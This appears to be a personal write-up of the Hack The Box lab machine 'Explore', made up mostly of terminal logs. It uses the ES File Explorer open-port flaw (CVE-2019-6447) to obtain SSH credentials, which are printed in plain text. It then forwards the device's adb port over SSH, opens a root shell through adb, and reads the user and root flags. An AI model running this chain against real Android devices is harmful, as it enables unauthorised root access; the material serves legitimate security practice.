
htb:Explore

Explore

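  • SSH local port forwarding (-L 5555:localhost:5555) to reach the device's adb port through the tunnel
  • adb connect to the forwarded port, then adb shell (which comes up as root)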

CVE-2019-6447 (ES File Explorer open port): getFile on a jpg gives the SSH credentials:

kristi:Kr1sT!5h@Rp3xPl0r3!

──(kali㉿kali)-[~/Desktop/ESFileExplorerOpenPortVuln]
└─$ ssh kristi@10.10.10.247 -p2222 -L 5555:localhost:5555
Password authentication
Password:
:/ $ ls
acct init.superuser.rc sbin
bin init.usb.configfs.rc sdcard
bugreports init.usb.rc sepolicy
cache init.zygote32.rc storage
charger init.zygote64_32.rc sys
config lib system
d mnt ueventd.android_x86_64.rc
data odm ueventd.rc
default.prop oem vendor
dev plat_file_contexts vendor_file_contexts
etc plat_hwservice_contexts vendor_hwservice_contexts
fstab.android_x86_64 plat_property_contexts vendor_property_contexts
init plat_seapp_contexts vendor_seapp_contexts
init.android_x86_64.rc plat_service_contexts vendor_service_contexts
init.environ.rc proc vndservice_contexts
init.rc product
:/ $ cd sdcard
:/sdcard $ ls
Alarms DCIM Movies Notifications Podcasts backups user.txt
Android Download Music Pictures Ringtones dianxinos
:/sdcard $ cat user.txt
f32017174c7c7e8f50c6da52891ae250
:/sdcard $


──(kali㉿kali)-[~/Desktop/ESFileExplorerOpenPortVuln]
└─$ adb device
Command 'adb' not found, but can be installed with:
sudo apt install adb

┌──(kali㉿kali)-[~/Desktop/ESFileExplorerOpenPortVuln]
└─$ sudo apt install adb
[sudo] password for kali:
Reading package lists... Done
Building dependency tree... Done
Reading state information... Done
The following packages were automatically installed and are no longer required:
golang-1.17-go golang-1.17-src golang-src pkg-config
Use 'sudo apt autoremove' to remove them.
The following additional packages will be installed:
android-libadb android-libbase android-libboringssl android-libcrypto-utils android-libcutils android-liblog
android-sdk-platform-tools-common
The following NEW packages will be installed:
adb android-libadb android-libbase android-libboringssl android-libcrypto-utils android-libcutils android-liblog
android-sdk-platform-tools-common
0 upgraded, 8 newly installed, 0 to remove and 1142 not upgraded.
Need to get 1,021 kB of archives.
After this operation, 3,057 kB of additional disk space will be used.
Do you want to continue? [Y/n] y
Get:1 https://mirrors.aliyun.com/kali kali-rolling/main amd64 android-liblog amd64 1:10.0.0+r36-7 [44.4 kB]
Get:2 https://mirrors.aliyun.com/kali kali-rolling/main amd64 android-libbase amd64 1:10.0.0+r36-7 [41.5 kB]
Get:3 https://mirrors.aliyun.com/kali kali-rolling/main amd64 android-libboringssl amd64 10.0.0+r36-1 [612 kB]
Get:4 https://mirrors.aliyun.com/kali kali-rolling/main amd64 android-libcrypto-utils amd64 1:10.0.0+r36-7 [12.3 kB]
Get:5 https://mirrors.aliyun.com/kali kali-rolling/main amd64 android-libcutils amd64 1:10.0.0+r36-7 [33.3 kB]
Get:6 https://mirrors.aliyun.com/kali kali-rolling/main amd64 android-libadb amd64 1:10.0.0+r36-7 [165 kB]
Get:7 https://mirrors.aliyun.com/kali kali-rolling/main amd64 android-sdk-platform-tools-common all 28.0.2+3 [8,020 B]
Get:8 https://mirrors.aliyun.com/kali kali-rolling/main amd64 adb amd64 1:10.0.0+r36-7 [104 kB]
Fetched 1,021 kB in 11s (89.7 kB/s)
Selecting previously unselected package android-liblog.
(Reading database ... 279936 files and directories currently installed.)
Preparing to unpack .../0-android-liblog_1%3a10.0.0+r36-7_amd64.deb ...
Unpacking android-liblog (1:10.0.0+r36-7) ...
Selecting previously unselected package android-libbase.
Preparing to unpack .../1-android-libbase_1%3a10.0.0+r36-7_amd64.deb ...
Unpacking android-libbase (1:10.0.0+r36-7) ...
Selecting previously unselected package android-libboringssl.
Preparing to unpack .../2-android-libboringssl_10.0.0+r36-1_amd64.deb ...
Unpacking android-libboringssl (10.0.0+r36-1) ...
Selecting previously unselected package android-libcrypto-utils.
Preparing to unpack .../3-android-libcrypto-utils_1%3a10.0.0+r36-7_amd64.deb ...
Unpacking android-libcrypto-utils (1:10.0.0+r36-7) ...
Selecting previously unselected package android-libcutils.
Preparing to unpack .../4-android-libcutils_1%3a10.0.0+r36-7_amd64.deb ...
Unpacking android-libcutils (1:10.0.0+r36-7) ...
Selecting previously unselected package android-libadb.
Preparing to unpack .../5-android-libadb_1%3a10.0.0+r36-7_amd64.deb ...
Unpacking android-libadb (1:10.0.0+r36-7) ...
Selecting previously unselected package android-sdk-platform-tools-common.
Preparing to unpack .../6-android-sdk-platform-tools-common_28.0.2+3_all.deb ...
Unpacking android-sdk-platform-tools-common (28.0.2+3) ...
Selecting previously unselected package adb.
Preparing to unpack .../7-adb_1%3a10.0.0+r36-7_amd64.deb ...
Unpacking adb (1:10.0.0+r36-7) ...
Setting up android-sdk-platform-tools-common (28.0.2+3) ...
Setting up android-liblog (1:10.0.0+r36-7) ...
Setting up android-libboringssl (10.0.0+r36-1) ...
Setting up android-libcrypto-utils (1:10.0.0+r36-7) ...
Setting up android-libbase (1:10.0.0+r36-7) ...
Setting up android-libcutils (1:10.0.0+r36-7) ...
Setting up android-libadb (1:10.0.0+r36-7) ...
Setting up adb (1:10.0.0+r36-7) ...
Processing triggers for libc-bin (2.32-4) ...
Processing triggers for man-db (2.9.3-2) ...
Processing triggers for kali-menu (2021.1.4) ...

┌──(kali㉿kali)-[~/Desktop/ESFileExplorerOpenPortVuln]
└─$ adb device
adb: unknown command device

┌──(kali㉿kali)-[~/Desktop/ESFileExplorerOpenPortVuln]
└─$ adb devices
* daemon not running; starting now at tcp:5037
* daemon started successfully
List of devices attached
emulator-5554 device


┌──(kali㉿kali)-[~/Desktop/ESFileExplorerOpenPortVuln]
└─$ adb connect 127.0.0.1:5555
connected to 127.0.0.1:5555

┌──(kali㉿kali)-[~/Desktop/ESFileExplorerOpenPortVuln]
└─$ adb -s localhost shell
error: device 'localhost' not found

┌──(kali㉿kali)-[~/Desktop/ESFileExplorerOpenPortVuln]
└─$ adb devices
List of devices attached
127.0.0.1:5555 device
emulator-5554 device


┌──(kali㉿kali)-[~/Desktop/ESFileExplorerOpenPortVuln]
└─$ adb -s 127.0.0.1 shell
x86_64:/ # whoami
root
x86_64:/ # ls
acct init oem sys
bin init.android_x86_64.rc plat_file_contexts system
bugreports init.environ.rc plat_hwservice_contexts ueventd.android_x86_64.rc
cache init.rc plat_property_contexts ueventd.rc
charger init.superuser.rc plat_seapp_contexts vendor
config init.usb.configfs.rc plat_service_contexts vendor_file_contexts
d init.usb.rc proc vendor_hwservice_contexts
data init.zygote32.rc product vendor_property_contexts
default.prop init.zygote64_32.rc sbin vendor_seapp_contexts
dev lib sdcard vendor_service_contexts
etc mnt sepolicy vndservice_contexts
fstab.android_x86_64 odm storage
x86_64:/ # cd data
x86_64:/data # ld
/system/bin/sh: ld: not found
127|x86_64:/data # ls
adb app-lib dalvik-cache lost+found misc_de resource-cache system_ce vendor
anr app-private data media nfc root.txt system_de vendor_ce
app backup drm mediadrm ota ss tombstones vendor_de
app-asec bootchart es_starter.sh misc ota_package ssh_starter.sh user
app-ephemeral cache local misc_ce property system user_de
x86_64:/data # cat root.txt
f04fc82b6d49b41c9b08982be59338c5
x86_64:/data #